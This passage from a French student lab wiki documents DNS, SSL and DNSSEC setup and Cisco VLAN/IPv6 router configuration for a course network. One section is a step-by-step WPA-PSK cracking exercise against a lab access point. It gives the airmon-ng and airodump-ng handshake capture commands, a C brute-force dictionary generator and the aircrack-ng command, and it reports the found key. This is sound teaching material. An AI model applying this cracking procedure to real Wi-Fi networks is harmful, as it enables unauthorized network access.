                           604800         ; Refresh&lt;br /&gt;
                            86400         ; Retry&lt;br /&gt;
                          2419200         ; Expire&lt;br /&gt;
                           604800 )       ; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
          IN      NS      ns.dionysos.space. ;dns principal&lt;br /&gt;
          IN      NS      ns6.gandi.net.     ;dns secondaire&lt;br /&gt;
  @       IN      A       193.48.57.178      ;acces sans le &amp;quot;www.&amp;quot;&lt;br /&gt;
  ns      IN      NS      193.48.57.178      ;acces avec http https&lt;br /&gt;
  www     IN      A       193.48.57.178;     ;acces avec le &amp;quot;www.&lt;br /&gt;
&lt;br /&gt;
====Certificat SSL====&lt;br /&gt;
  &lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
  openssl req -nodes -newkey rsa:2048 -sha1 -keyout dionysos.space.key -out dionysos.space.csr&lt;br /&gt;
  ...&lt;br /&gt;
  Common Name (e.g. server FQDN or YOUR name) []:dionysos.space et dionysos.space.key&lt;br /&gt;
  Email Address []:qboens@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Cette opération génére deux fichiers : dionysos.space.crt et dionysos.space.key&lt;br /&gt;
&lt;br /&gt;
Une fois cette étape faite on récupére sur gandi GandiStandardSSLCA2.pem, dans l'onglet du certificat.&lt;br /&gt;
&lt;br /&gt;
Tous les fichiers sont placés dans le répertoire SSL_certif&lt;br /&gt;
  mv dionysos.space.csr SSL_certif&lt;br /&gt;
  mv dionysos.space.key SSL_certif&lt;br /&gt;
  mv GandiStandardSSLCA2.pem SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Installation de DNSSEC====&lt;br /&gt;
&lt;br /&gt;
Création de la clef KSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
Création de la clef ZSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ces clefs ont été crées dans le dossier SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'un fichier signé à partir de db.dionysos.space&lt;br /&gt;
  dnssec-signzone -o dionysos.space -k dionysos-ksk.key /etc/bind/db.dionysos.space dionysos-zsk.key &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local nous changons le fichier cible, pour que bind9 prenne en compte db.dionysos.space.signed, qui est le fichier signé&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space.signed&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
Puis nous relançons bind9&lt;br /&gt;
  service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Sur le site gandi nous ajoutons les deux clefs, dans l'onglet DNSSEC&lt;br /&gt;
&lt;br /&gt;
===Séance 3.5 : 14/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Craquage WPA/PSK par dictionnaire====&lt;br /&gt;
&lt;br /&gt;
Materiel utilisé :&lt;br /&gt;
&lt;br /&gt;
* un PC portable&lt;br /&gt;
* une clé Wi-Pi (nécessaire pour le PC portable que nous avons utilisé pour la partie handshake)&lt;br /&gt;
* Zabeth13 pour le craquage&lt;br /&gt;
&lt;br /&gt;
=====Récupération du handshake=====&lt;br /&gt;
&lt;br /&gt;
Premièrement sur le PC portable SOLE, &lt;br /&gt;
&lt;br /&gt;
 #ip a&lt;br /&gt;
&lt;br /&gt;
pour vérifier que nous disposons bien d'une interface wifi &amp;lt;code&amp;gt;wlx40a5ef0f68ce&amp;lt;/code&amp;gt;, puis nous l'utilisons pour écouter sur le wifi :&lt;br /&gt;
&lt;br /&gt;
 #airmon-ng start &amp;lt;nom_de_l'interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère l'interface retournée, dans notre cas &amp;lt;code&amp;gt;wlan0mon&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On note l'ESSID de cracotte02 et son channel pour ensuite renvoyer dans des fichiers&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng --bssid &amp;lt;ESSID cracotte02&amp;gt; wlan0mon --channel 9 --write FILENAME&lt;br /&gt;
&lt;br /&gt;
On dispose ensuite de 4 fichiers FILENAME.cap FILENAME.csv FILENAME.kismet.csv FILENAME.kismet.netxml&lt;br /&gt;
&lt;br /&gt;
On peut à présent transférer ces fichiers sur ZABETH13 via clé usb:&lt;br /&gt;
&lt;br /&gt;
=====Rappel montage USB=====&lt;br /&gt;
&lt;br /&gt;
 #fdisk -l                                                 //avant de brancher la clé USB&lt;br /&gt;
 #fdisk -l                                                 //on récupère l'emplacement de la clé (ex: /dev/sdb -&amp;gt; /dev/sdb1)&lt;br /&gt;
 #mkdir /media/MA_CLE_USB&lt;br /&gt;
 #mount /dev/sdb1 /media/MA_CLE_USB&lt;br /&gt;
 #mv /home/pifou/Mon_FICHIER /media/MA_CLE_USB             //répéter autant que nécessaire&lt;br /&gt;
 #umount /media/MA_CLE_USB&lt;br /&gt;
&lt;br /&gt;
=====Crack WPA/PSK=====&lt;br /&gt;
&lt;br /&gt;
On crée un petit programme &amp;lt;code&amp;gt;main.c&amp;lt;/code&amp;gt; pour lister tous les codes possibles, on sait qu'il s'agit d'un code de 8 chiffres&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     int i;&lt;br /&gt;
     // key is 8 numeric digits&lt;br /&gt;
     for(i=0;i&amp;lt;99999999;i++){&lt;br /&gt;
         printf(&amp;quot;%d\n&amp;quot;,i);&lt;br /&gt;
     }&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
On compile et on stock dans un txt&lt;br /&gt;
&lt;br /&gt;
 #gcc main.c -o main -Wall&lt;br /&gt;
 #./main &amp;gt; dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
On peut à présent lancer le crack&lt;br /&gt;
&lt;br /&gt;
 #aircrack-ng FILENAME.cap -w dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crack-cracotte02.png]]&lt;br /&gt;
&lt;br /&gt;
Après un certains temps d'execution, on obtient la clé&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Found_key.png]]&lt;br /&gt;
&lt;br /&gt;
Clé : 42429902&lt;br /&gt;
===Séance 4 : 17/12/2018===&lt;br /&gt;
====Correction IPV6 routeur====&lt;br /&gt;
&lt;br /&gt;
===== Vlan 43 - XEN =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 131 - Interconnexion =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 10+N - Groupe N =====&lt;br /&gt;
&lt;br /&gt;
'''IPv4'''&lt;br /&gt;
&lt;br /&gt;
* Notre Routeur : &amp;lt;code&amp;gt;10.60.10+N.252&amp;lt;/code&amp;gt;&lt;br /&gt;
* Routeur Virtuel : &amp;lt;code&amp;gt;10.60.10+N.254&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''IPv6'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;2001:660:4401:60XX&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* VLAN 11 à 21 : &amp;lt;code&amp;gt;C1&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;CB&amp;lt;/code&amp;gt;&lt;br /&gt;
* VLAN 43 : &amp;lt;code&amp;gt;C0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Groupe 1&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan11&lt;br /&gt;
 int vlan11&lt;br /&gt;
 ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 11 ip 10.60.11.254&lt;br /&gt;
 standby 11 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 11&lt;br /&gt;
 name groupe1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 2&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan12&lt;br /&gt;
 int vlan12&lt;br /&gt;
 ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 12 ip 10.60.12.254&lt;br /&gt;
 standby 12 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 12&lt;br /&gt;
 name groupe2&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 3&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan13&lt;br /&gt;
 int vlan13&lt;br /&gt;
 ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 13 ip 10.60.13.254&lt;br /&gt;
 standby 13 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 13&lt;br /&gt;
 name groupe3&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 4&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan14&lt;br /&gt;
 int vlan14&lt;br /&gt;
 ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 14 ip 10.60.14.254&lt;br /&gt;
 standby 14 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 14&lt;br /&gt;
 name groupe4&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 5&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan15&lt;br /&gt;
 int vlan15&lt;br /&gt;
 ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 15 ip 10.60.15.254&lt;br /&gt;
 standby 15 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 15&lt;br /&gt;
 name groupe5&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan16&lt;br /&gt;
 int vlan16&lt;br /&gt;
 ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 16 ip 10.60.16.254&lt;br /&gt;
 standby 16 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 16&lt;br /&gt;
 name groupe6&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 7&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan17&lt;br /&gt;
 int vlan17&lt;br /&gt;
 ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 17 ip 10.60.17.254&lt;br /&gt;
 standby 17 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 17&lt;br /&gt;
 name groupe7&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 8&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan18&lt;br /&gt;
 int vlan18&lt;br /&gt;
 ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 18 ip 10.60.18.254&lt;br /&gt;
 standby 18 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 18&lt;br /&gt;
 name groupe8&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 9&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan19&lt;br /&gt;
 int vlan19&lt;br /&gt;
 ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 19 ip 10.60.19.254&lt;br /&gt;
 standby 19 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 19&lt;br /&gt;
 name groupe9&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 10&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan20&lt;br /&gt;
 int vlan20&lt;br /&gt;
 ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 20 ip 10.60.20.254&lt;br /&gt;
 standby 20 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 20&lt;br /&gt;
 name groupe10&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 11&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan21&lt;br /&gt;
 int vlan21&lt;br /&gt;
 ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 21 ip 10.60.21.254&lt;br /&gt;
 standby 21 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 21&lt;br /&gt;
 name groupe11&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérifications du fonctionnement =====&lt;br /&gt;
&lt;br /&gt;
====== show running-config ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show run &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 spanning-tree mode pvst&lt;br /&gt;
 spanning-tree loopguard default&lt;br /&gt;
 spanning-tree etherchannel guard misconfig&lt;br /&gt;
 spanning-tree extend system-id&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/3&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/4&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/5&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/6&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/7&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !         &lt;br /&gt;
 interface GigabitEthernet0/8&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/9&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/10&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/11&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface TenGigabitEthernet0/1&lt;br /&gt;
  switchport access vlan 131&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface TenGigabitEthernet0/2&lt;br /&gt;
  switchport access vlan 43&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan11&lt;br /&gt;
  ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 11 ip 10.60.11.254&lt;br /&gt;
  standby 11 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan12&lt;br /&gt;
  ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 12 ip 10.60.12.254&lt;br /&gt;
  standby 12 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan13&lt;br /&gt;
  ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 13 ip 10.60.13.254&lt;br /&gt;
  standby 13 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan14&lt;br /&gt;
  ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 14 ip 10.60.14.254&lt;br /&gt;
  standby 14 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan15&lt;br /&gt;
  ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 15 ip 10.60.15.254&lt;br /&gt;
  standby 15 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan16&lt;br /&gt;
  ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 16 ip 10.60.16.254&lt;br /&gt;
  standby 16 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan17&lt;br /&gt;
  ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 17 ip 10.60.17.254&lt;br /&gt;
  standby 17 preempt&lt;br /&gt;
 !         &lt;br /&gt;
 interface Vlan18&lt;br /&gt;
  ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 18 ip 10.60.18.254&lt;br /&gt;
  standby 18 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan19&lt;br /&gt;
  ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 19 ip 10.60.19.254&lt;br /&gt;
  standby 19 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan20&lt;br /&gt;
  ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 20 ip 10.60.20.254&lt;br /&gt;
  standby 20 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan21&lt;br /&gt;
  ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 21 ip 10.60.21.254&lt;br /&gt;
  standby 21 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan43&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 22 ip 193.48.57.190&lt;br /&gt;
  standby 22 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan131&lt;br /&gt;
  ip address 192.168.222.9 255.255.255.248&lt;br /&gt;
  ipv6 address FE80::2 link-local&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 rip tpima2a5 enable&lt;br /&gt;
 !&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 router rip tpima5sc&lt;br /&gt;
  redistribute connected metric 1&lt;br /&gt;
  redistribute static metric 1&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 end&lt;br /&gt;
&lt;br /&gt;
====== Show Interface status ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show int status &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Port      Name               Status       Vlan       Duplex  Speed Type&lt;br /&gt;
 Gi0/1                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/2                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/3                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/4                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/5                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/6                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/7                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/8                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/9                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/10                       connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/11                       connected    trunk      a-full a-1000 10/100/1000BaseTX            // Vers C2&lt;br /&gt;
 &lt;br /&gt;
 Gi0/12                       notconnect   1            auto   auto 10/100/1000BaseTX            // Borne Wi-Fi du groupe 1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/13                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/14                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 [...]                        //           //           //     //   //&lt;br /&gt;
 Gi0/47                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/48                       notconnect   1            auto   auto 10/100/1000BaseTX  &lt;br /&gt;
           &lt;br /&gt;
